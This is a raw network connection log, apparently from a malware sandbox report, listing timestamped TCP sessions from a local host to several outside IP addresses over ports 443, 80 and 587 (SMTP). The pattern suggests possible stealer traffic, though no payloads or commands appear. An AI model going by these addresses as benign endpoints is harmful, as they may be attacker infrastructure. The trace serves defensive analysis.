Jan 14, 2025 14:23:04.057431936 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.057439089 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.057516098 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.057667971 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.057727098 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.057749033 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.057790041 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.190562963 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.190696955 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.245492935 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.245593071 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.306013107 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.306080103 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.428610086 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.428689957 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.428724051 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.428770065 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.435344934 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.435390949 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.435405016 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.435420990 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.435435057 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.435460091 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.492856979 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.492935896 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.492955923 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.492995977 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.617342949 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.617388010 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.617403984 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.617423058 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.617436886 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.617455959 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.624799013 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.624849081 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.624921083 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.624955893 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.624982119 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.624995947 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.683193922 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.683276892 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.757813931 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.757877111 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.807898998 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.807990074 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.808037043 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.808077097 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.808093071 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.808113098 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.843977928 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.844079018 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.872920990 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.872996092 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:04.964781046 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:04.964864969 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:05.001234055 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.001283884 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.001319885 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:05.001338959 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.001379967 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:05.001399994 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:05.008624077 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.008673906 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.008701086 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:05.008722067 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.008744955 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:05.008764029 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:05.275300026 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.275346994 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.275381088 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:05.275408983 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.275427103 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:05.275441885 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:05.275860071 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.275902033 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:05.275929928 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.275973082 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:05.362853050 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.362983942 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:05.461831093 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.462039948 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:05.462076902 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.462116957 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:05.672214985 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.672281027 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:05.672440052 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.672698021 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.672723055 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:05.672736883 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.672748089 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:05.672749996 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.672789097 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:05.672796965 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.672835112 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:05.760816097 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.760881901 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:05.961672068 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.961756945 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:05.961812019 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:05.961857080 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:06.050108910 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.050249100 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:06.050261974 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.050307989 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:06.197807074 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.197875977 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:06.197904110 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.197952032 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:06.198102951 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.198132992 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.198149920 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:06.198158979 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.198188066 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:06.244648933 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:06.429725885 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.429800034 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:06.429910898 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.429956913 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:06.430252075 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.430285931 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.430309057 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:06.430310011 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.430324078 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.430335045 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:06.430356026 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:06.479020119 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:06.666218996 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.666232109 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.666268110 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.666289091 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:06.666309118 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.666322947 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.666343927 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:06.666354895 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.666363001 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:06.666363955 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.666395903 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.666399002 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:06.666435003 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:06.666733980 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.713409901 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:06.893629074 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.893644094 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.893737078 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:06.894351006 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.894359112 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.894530058 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:06.894542933 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:06.947791100 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:07.154699087 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.154712915 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.154752016 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.154838085 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:07.154860020 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.154886007 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:07.154932022 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:07.243241072 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.243252993 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.243388891 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:07.528268099 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.528283119 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.528321028 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.528347015 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.528354883 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.528388977 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:07.528403044 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.528443098 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:07.712995052 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.713074923 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:07.713298082 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.713361025 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:07.713406086 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.713454962 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:07.763262033 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.763309002 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.763353109 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:07.763370991 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.763396025 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:07.807208061 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:07.898288012 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.898354053 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:07.898438931 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.898468971 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.898488998 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:07.898504019 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.898534060 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:07.947768927 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:07.947781086 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.951030016 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.951107979 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:07.951117992 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:07.951154947 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:08.087690115 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:08.087805033 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:08.087929964 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:08.088005066 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:08.088016987 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:08.088077068 CET	443	49699	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:08.088119030 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:08.093362093 CET	49699	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:09.240417957 CET	49736	80	192.168.2.7	193.122.130.0
Jan 14, 2025 14:23:09.245305061 CET	80	49736	193.122.130.0	192.168.2.7
Jan 14, 2025 14:23:09.245376110 CET	49736	80	192.168.2.7	193.122.130.0
Jan 14, 2025 14:23:09.245731115 CET	49736	80	192.168.2.7	193.122.130.0
Jan 14, 2025 14:23:09.250576019 CET	80	49736	193.122.130.0	192.168.2.7
Jan 14, 2025 14:23:09.700246096 CET	80	49736	193.122.130.0	192.168.2.7
Jan 14, 2025 14:23:09.705372095 CET	49736	80	192.168.2.7	193.122.130.0
Jan 14, 2025 14:23:09.712666988 CET	80	49736	193.122.130.0	192.168.2.7
Jan 14, 2025 14:23:09.851670980 CET	80	49736	193.122.130.0	192.168.2.7
Jan 14, 2025 14:23:09.862236977 CET	49741	443	192.168.2.7	104.21.64.1
Jan 14, 2025 14:23:09.862279892 CET	443	49741	104.21.64.1	192.168.2.7
Jan 14, 2025 14:23:09.862341881 CET	49741	443	192.168.2.7	104.21.64.1
Jan 14, 2025 14:23:09.866893053 CET	49741	443	192.168.2.7	104.21.64.1
Jan 14, 2025 14:23:09.866906881 CET	443	49741	104.21.64.1	192.168.2.7
Jan 14, 2025 14:23:09.900906086 CET	49736	80	192.168.2.7	193.122.130.0
Jan 14, 2025 14:23:10.329294920 CET	443	49741	104.21.64.1	192.168.2.7
Jan 14, 2025 14:23:10.329368114 CET	49741	443	192.168.2.7	104.21.64.1
Jan 14, 2025 14:23:10.331883907 CET	49741	443	192.168.2.7	104.21.64.1
Jan 14, 2025 14:23:10.331895113 CET	443	49741	104.21.64.1	192.168.2.7
Jan 14, 2025 14:23:10.332235098 CET	443	49741	104.21.64.1	192.168.2.7
Jan 14, 2025 14:23:10.385272980 CET	49741	443	192.168.2.7	104.21.64.1
Jan 14, 2025 14:23:10.840605021 CET	49741	443	192.168.2.7	104.21.64.1
Jan 14, 2025 14:23:10.887321949 CET	443	49741	104.21.64.1	192.168.2.7
Jan 14, 2025 14:23:10.957067013 CET	443	49741	104.21.64.1	192.168.2.7
Jan 14, 2025 14:23:10.957221031 CET	443	49741	104.21.64.1	192.168.2.7
Jan 14, 2025 14:23:10.957297087 CET	49741	443	192.168.2.7	104.21.64.1
Jan 14, 2025 14:23:11.016721010 CET	49741	443	192.168.2.7	104.21.64.1
Jan 14, 2025 14:23:16.397912979 CET	49736	80	192.168.2.7	193.122.130.0
Jan 14, 2025 14:23:16.402802944 CET	80	49736	193.122.130.0	192.168.2.7
Jan 14, 2025 14:23:16.515964031 CET	80	49736	193.122.130.0	192.168.2.7
Jan 14, 2025 14:23:16.537030935 CET	49780	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:16.541860104 CET	587	49780	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:16.541934013 CET	49780	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:16.557167053 CET	49736	80	192.168.2.7	193.122.130.0
Jan 14, 2025 14:23:17.200357914 CET	587	49780	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:17.204293013 CET	49780	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:17.210288048 CET	587	49780	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:17.364546061 CET	587	49780	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:17.372348070 CET	49780	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:17.377201080 CET	587	49780	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:17.532608032 CET	587	49780	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:17.535582066 CET	49780	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:17.540508986 CET	587	49780	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:17.700027943 CET	587	49780	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:17.704626083 CET	49780	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:17.709615946 CET	587	49780	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:17.866174936 CET	587	49780	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:17.873682022 CET	49780	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:17.878559113 CET	587	49780	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:18.036905050 CET	587	49780	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:18.037080050 CET	49780	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:18.041902065 CET	587	49780	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:18.196913004 CET	587	49780	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:18.197423935 CET	49780	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:18.197506905 CET	49780	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:18.197530985 CET	49780	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:18.197585106 CET	49780	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:18.202213049 CET	587	49780	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:18.202327013 CET	587	49780	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:18.202449083 CET	587	49780	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:18.202469110 CET	587	49780	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:18.470266104 CET	587	49780	162.254.34.31	192.168.2.7
Jan 14, 2025 14:23:18.510323048 CET	49780	587	192.168.2.7	162.254.34.31
Jan 14, 2025 14:23:18.613388062 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:18.613425970 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:18.613487959 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:18.620069981 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:18.620085955 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:19.731865883 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:19.731973886 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:19.736555099 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:19.736565113 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:19.737339020 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:19.787516117 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:19.831341028 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:20.589942932 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:20.590004921 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:20.590075016 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:20.590091944 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:20.590111971 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:20.590162039 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:20.590167999 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:20.590207100 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:20.590253115 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:20.590257883 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:20.590368032 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:20.770920992 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:20.771039963 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:20.771179914 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:20.771325111 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:20.771352053 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:20.771774054 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:20.771831036 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:20.771838903 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:20.771867037 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:20.771879911 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:20.771897078 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:20.771914959 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:20.822864056 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:20.962172985 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:20.962188005 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:20.962291956 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:21.158514023 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:21.158529997 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:21.158588886 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:21.158653021 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:21.158701897 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:21.158838987 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:21.158884048 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:21.159656048 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:21.159698009 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:21.159706116 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:21.159713030 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:21.159739017 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:21.213463068 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:21.345849037 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:21.345863104 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:21.346046925 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:21.346348047 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:21.346355915 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:21.346394062 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:21.346570969 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:21.346576929 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:21.346616983 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:21.346656084 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:21.346662045 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:21.346693039 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:21.346709967 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:21.526202917 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:21.526249886 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:21.526274920 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:21.526293039 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:21.526318073 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:21.526326895 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:21.526644945 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:21.526684999 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:21.526690960 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:21.526695013 CET	443	49789	194.15.112.248	192.168.2.7
Jan 14, 2025 14:23:21.526722908 CET	49789	443	192.168.2.7	194.15.112.248
Jan 14, 2025 14:23:21.526741028 CET	49789	443	192.168.2.7	194.15.112.248
